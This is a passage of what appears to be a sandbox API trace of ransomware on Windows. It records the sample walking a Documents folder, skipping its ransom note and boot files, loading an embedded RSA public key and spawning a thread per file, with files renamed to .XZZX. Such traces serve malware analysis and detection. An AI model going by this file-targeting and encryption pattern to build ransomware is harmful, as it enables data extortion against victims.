(pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1") returned="IkpxUp8UshIgHl1" [0177.692] lstrcpyW (in: lpString1=0x17a5a4, lpString2="IkpxUp8UshIgHl1" | out: lpString1="IkpxUp8UshIgHl1") returned="IkpxUp8UshIgHl1" [0177.692] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0177.692] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0177.692] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0177.692] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0177.692] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0177.692] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0177.692] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0177.692] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0177.692] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0177.692] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0177.692] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0177.692] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0177.692] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0177.692] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 1 [0177.692] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 0 [0177.692] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0177.692] lstrcmpW (lpString1="ZW28zqHzfxAY2NV", lpString2="..") returned 1 [0177.692] lstrcmpW (lpString1="ZW28zqHzfxAY2NV", lpString2=".") returned 1 [0177.692] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" [0177.692] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0177.692] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpString2="ZW28zqHzfxAY2NV" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV" [0177.693] SetErrorMode (uMode=0x1) returned 0x1 [0177.693] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV" [0177.693] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0177.693] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0177.693] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*" [0177.693] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdea18 [0177.693] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV") returned="ZW28zqHzfxAY2NV" [0177.693] lstrcpyW (in: lpString1=0x17a5a4, lpString2="ZW28zqHzfxAY2NV" | out: lpString1="ZW28zqHzfxAY2NV") returned="ZW28zqHzfxAY2NV" [0177.693] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0177.693] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0177.693] lstrcmpW (lpString1="0FE24CF432281F2497377D743655036C.XZZX", lpString2="..") returned 1 [0177.693] lstrcmpW (lpString1="0FE24CF432281F2497377D743655036C.XZZX", lpString2=".") returned 1 [0177.693] StrStrW (lpFirst="0FE24CF432281F2497377D743655036C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0177.693] StrStrW (lpFirst="0FE24CF432281F2497377D743655036C.XZZX", lpSrch="ntldr") returned 0x0 [0177.694] StrStrW (lpFirst="0FE24CF432281F2497377D743655036C.XZZX", lpSrch="NTLDR") returned 0x0 [0177.694] StrStrW (lpFirst="0FE24CF432281F2497377D743655036C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0177.694] StrStrW (lpFirst="0FE24CF432281F2497377D743655036C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0177.694] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0177.694] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") [0177.694] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0177.694] lstrcpyW (in: lpString1=0x17addc, lpString2="0FE24CF432281F2497377D743655036C.XZZX" | out: lpString1="0FE24CF432281F2497377D743655036C.XZZX") returned="0FE24CF432281F2497377D743655036C.XZZX" [0177.694] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0177.694] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xacc [0177.694] Sleep (dwMilliseconds=0x96) [0177.845] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0177.845] lstrcmpW (lpString1="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpString2="..") returned 1 [0177.845] lstrcmpW (lpString1="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpString2=".") returned 1 [0177.846] StrStrW (lpFirst="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0177.846] StrStrW (lpFirst="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpSrch="ntldr") returned 0x0 [0177.846] StrStrW (lpFirst="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpSrch="NTLDR") returned 0x0 [0177.846] StrStrW (lpFirst="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0177.846] StrStrW (lpFirst="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpSrch="ntdetect.com") returned 0x0 [0177.846] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0177.846] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") [0177.846] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0177.846] lstrcpyW (in: lpString1=0x17addc, lpString2="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX" | out: lpString1="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX") returned="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX" [0177.846] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0177.846] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xad0 [0177.846] Sleep (dwMilliseconds=0x96) [0178.001] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0178.001] lstrcmpW (lpString1="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpString2="..") returned 1 [0178.001] lstrcmpW (lpString1="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpString2=".") returned 1 [0178.001] StrStrW (lpFirst="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0178.001] StrStrW (lpFirst="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpSrch="ntldr") returned 0x0 [0178.001] StrStrW (lpFirst="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpSrch="NTLDR") returned 0x0 [0178.001] StrStrW (lpFirst="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0178.002] StrStrW (lpFirst="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpSrch="ntdetect.com") returned 0x0 [0178.002] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0178.002] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") [0178.002] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0178.002] lstrcpyW (in: lpString1=0x17addc, lpString2="5154BE9C1011AFD27B96A6C6143E941A.XZZX" | out: lpString1="5154BE9C1011AFD27B96A6C6143E941A.XZZX") returned="5154BE9C1011AFD27B96A6C6143E941A.XZZX" [0178.002] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0178.002] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xad4 [0178.002] Sleep (dwMilliseconds=0x96) [0178.159] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0178.159] lstrcmpW (lpString1="632A4073379A2FDC09389DEB3BC71424.XZZX", lpString2="..") returned 1 [0178.159] lstrcmpW (lpString1="632A4073379A2FDC09389DEB3BC71424.XZZX", lpString2=".") returned 1 [0178.159] StrStrW (lpFirst="632A4073379A2FDC09389DEB3BC71424.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0178.159] StrStrW (lpFirst="632A4073379A2FDC09389DEB3BC71424.XZZX", lpSrch="ntldr") returned 0x0 [0178.159] StrStrW (lpFirst="632A4073379A2FDC09389DEB3BC71424.XZZX", lpSrch="NTLDR") returned 0x0 [0178.159] StrStrW (lpFirst="632A4073379A2FDC09389DEB3BC71424.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0178.159] StrStrW (lpFirst="632A4073379A2FDC09389DEB3BC71424.XZZX", lpSrch="ntdetect.com") returned 0x0 [0178.159] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0178.159] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") [0178.159] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0178.159] lstrcpyW (in: lpString1=0x17addc, lpString2="632A4073379A2FDC09389DEB3BC71424.XZZX" | out: lpString1="632A4073379A2FDC09389DEB3BC71424.XZZX") returned="632A4073379A2FDC09389DEB3BC71424.XZZX" [0178.159] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0178.160] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xad8 [0178.160] Sleep (dwMilliseconds=0x96) [0178.313] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0178.313] lstrcmpW (lpString1="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpString2="..") returned 1 [0178.313] lstrcmpW (lpString1="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpString2=".") returned 1 [0178.313] StrStrW (lpFirst="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0178.313] StrStrW (lpFirst="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpSrch="ntldr") returned 0x0 [0178.313] StrStrW (lpFirst="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpSrch="NTLDR") returned 0x0 [0178.313] StrStrW (lpFirst="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0178.313] StrStrW (lpFirst="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpSrch="ntdetect.com") returned 0x0 [0178.313] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0178.313] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") [0178.314] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0178.314] lstrcpyW (in: lpString1=0x17addc, lpString2="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX" | out: lpString1="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX") returned="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX" [0178.314] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0178.314] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xadc [0178.314] WaitForSingleObject (hHandle=0xadc, dwMilliseconds=0xffffffff) returned 0x0 [0178.315] Sleep (dwMilliseconds=0x96) [0178.469] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0178.469] lstrcmpW (lpString1="73C0D9902A7964C0808D031B2E914908.XZZX", lpString2="..") returned 1 [0178.469] lstrcmpW (lpString1="73C0D9902A7964C0808D031B2E914908.XZZX", lpString2=".") returned 1 [0178.469] StrStrW (lpFirst="73C0D9902A7964C0808D031B2E914908.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0178.469] StrStrW (lpFirst="73C0D9902A7964C0808D031B2E914908.XZZX", lpSrch="ntldr") returned 0x0 [0178.469] StrStrW (lpFirst="73C0D9902A7964C0808D031B2E914908.XZZX", lpSrch="NTLDR") returned 0x0 [0178.469] StrStrW (lpFirst="73C0D9902A7964C0808D031B2E914908.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0178.469] StrStrW (lpFirst="73C0D9902A7964C0808D031B2E914908.XZZX", lpSrch="ntdetect.com") returned 0x0 [0178.469] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0178.469] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") [0178.470] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- 